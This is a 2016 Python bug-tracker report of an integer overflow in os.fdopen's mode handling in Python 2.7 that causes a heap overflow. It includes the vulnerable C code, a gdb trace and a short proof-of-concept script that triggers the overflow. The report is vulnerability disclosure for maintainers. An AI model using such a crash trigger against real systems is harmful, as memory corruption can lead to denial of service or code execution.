[New-bugs-announce] [issue27235] Heap overflow occurred due to the int overflow
Rustemzade Mehemmed
report at bugs.python.org
Sun Jun 5 14:01:37 EDT 2016
New submission from Rustemzade Mehemmed:
I have tested this vulnerability on the Python 2.7 and it absolutely affected :). Integer overflow produce in posix_fdopen function. If an attacker sent fdopen mode value larger than max integer value (2*32) to fdopen after integer overflow occurred.
int fd;
char *orgmode = "r";
int bufsize = -1;
FILE *fp;
PyObject *f;
char *mode;
if (!PyArg_ParseTuple(args, "i|si", &fd, &orgmode, &bufsize))
return NULL;
/* Sanitize mode. See fileobject.c */
mode = PyMem_MALLOC(strlen(orgmode)+3);
...
strcpy(mode, orgmode);
os.fdopen(fd[, mode[, bufsize]])
fo = os.fdopen(fd, "r"*0xffffffff)
0x5e2595 <+86>: mov edi,eax
=> 0x5e2598 <+89>: call 0x416e50 <strlen at plt>
(gdb) print /x $eax
$1 = 0xffffffff
after does addition of "add" instruction therefore overflow occured and => 0x5e259d <+94>: add eax,0x3
(gdb) print /x $eax
$5 = 0x2
and memory allocate after buffer copy== >
0x5e25a1 <+98>: mov edi,eax
0x5e25a4 <+101>: call 0x48f793 <_PyMem_DebugMalloc>
0x5e25cb <+140>: mov esi,edx
...
0x5e25ce <+143>: mov edi,eax
0x5e25d1 <+146>: call 0x416b80 <strcpy at plt>
copy buffer
strcpy(mode, orgmode); <=== overflow
poc:
#!/usr/bin/python
import os, sys
fd = os.open( "foo.txt", os.O_RDWR|os.O_CREAT )
fo = os.fdopen(fd, "r"*0xffffff)
print "Closed the file successfully!!"
----------
messages: 267447
nosy: madness
priority: normal
severity: normal
status: open
title: Heap overflow occurred due to the int overflow
_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue27235>
_______________________________________
More information about the New-bugs-announce
mailing list